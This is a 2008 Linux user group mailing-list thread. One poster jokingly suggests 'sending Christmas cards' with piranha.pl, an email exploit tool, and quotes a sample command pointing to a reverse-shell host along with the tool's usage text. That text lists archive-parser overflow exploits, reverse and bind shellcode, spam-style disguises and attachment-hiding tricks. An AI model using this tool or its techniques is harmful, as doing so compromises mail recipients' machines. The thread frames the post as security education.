HackFest Series: Email Christmas Cheer

Stephen cryptworks at gmail.com
Thu Dec 25 14:08:42 MST 2008 

More the timing than anything

On 12/25/08, Lisa Kachold <lisakachold at obnosis.com> wrote:
>
> cryptworks said:
>
>
>> Date: Thu, 25 Dec 2008 13:03:10 -0700
>> From: cryptworks at gmail.com
>> To: plug-discuss at lists.plug.phoenix.az.us
>> Subject: Re: HackFest Series: Email Christmas Cheer
>>
>> That's twisted but funny
>
> It's my job to educate ALL as we happily anesthetize each other (and Noob
> Linux Penguins) with how safe (and virus free) NIX is; someone must be the
> voice that reminds all that Linux is a powerful tool, to be wielded
> carefully and TRUST is the basis of ALL SECURITY.
>
> But you can trust me....really!
>
> www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |
> hackfest.obnosis.com (503)754-4452
> January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
> Forensics @ UAT 1/10/09 12-3PM
> Take the Black [Linux/Vista-XP/OS X BackTrack3] Pill & leave SecurityMatrix,
> or take the Blue [XP/Vista Update] Pill & stay happily ignorant.
>
>> On 12/25/08, Lisa Kachold <lisakachold at obnosis.com> wrote:
>> >
>> >
>> >
>> >
>> >
>> >
>> >
>> >
>> >
>> >
>> > Send some Christmas cards:
>> >
>> > $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
>> > myname at mydomain.com
>> >
>> >
>> > Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
>> >
>> > Mandatory arguments:
>> >   -e+           Exploit number to use (See below)
>> >   -h+           SMTP server to test
>> >   -a+           Destination email address used in probing
>> >
>> > Optional arguments:
>> >   -s+          Shellcode type to inject into exploits (See below)
>> >   -c+          Cloaking style (See below)
>> >   -d+          Try to vanish attachments from MUA's view (See below)
>> >   -v            Attach EICAR virus to improve stealthness
>> >   -z            Pack all the malware into a tarball to be less noisy
>> >   -p+          Port to use in reverse shell or bind shell
>> >   -l+           Host to connect back in reverse shell mode
>> >
>> > Valid exploits numbers:
>> >    0            OSVDB #5753:    LHA get_header File Name Overflow
>> >    1            OSVDB #5754:    LHA get_header Directory Name Overflow
>> >    2            OSVDB #6456:    file readelf.c tryelf() ELF Header
>> > Overflow
>> >    3            OSVDB #11695:   unarj Filename Handling Overflow
>> >    4            OSVDB #23460:   ZOO combine File and Dir name overflow
>> >    5            OSVDB #15867:   Convert UUlib uunconc integer overflow
>> >    6            OSVDB #XXX:     ZOO next offset infinite loop DoS
>> >
>> > Valid shellcode types:
>> >    0            TCP reverse shell
>> >    1            UDP reverse shell
>> >    2            TCP bind shell
>> >
>> > Valid cloaking styles (consult whitepaper for visual result):
>> >    0            No cloaking at all (default)
>> >    1            Viagra spam message
>> >    2            "Look at the pictures I promised you!"
>> >
>> > Vanishing techniques for attachments:
>> >    0            No vanishing at all (default)
>> >    1            Multipart/alternative trick
>> >    2            <img src="image.JPG" width=0 height=0> trick
>> >
>> > www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |
>> > hackfest.obnosis.com (503)754-4452
>> > January PLUG HackFest = Kristy Westphal, AZ Department of Economic
>> > Security
>> > Forensics @ UAT 1/10/09 12-3PM
>> > Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix,
>> > or
>> > take the Blue [XP/Vista Update] Pill & stay happily ignorant.
>> >
>> > http://uncyclopedia.wikia.com/wiki/Satan_Claus
>> > _________________________________________________________________
>> > Send e-mail anywhere. No map, no compass.
>> > http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008
>>
>> --
>> Sent from my mobile device
>>
>> A mouse trap, placed on top of your alarm clock, will prevent you from
>> rolling over and going back to sleep after you hit the snooze button.
>>
>> Stephen
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
> _________________________________________________________________
> It's the same Hotmail(R). If by "same" you mean up to 70% faster.
> http://windowslive.com/online/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_broad1_122008

-- 
Sent from my mobile device

A mouse trap, placed on top of your alarm clock, will prevent you from
rolling over and going back to sleep after you hit the snooze button.

Stephen

More information about the PLUG-discuss mailing list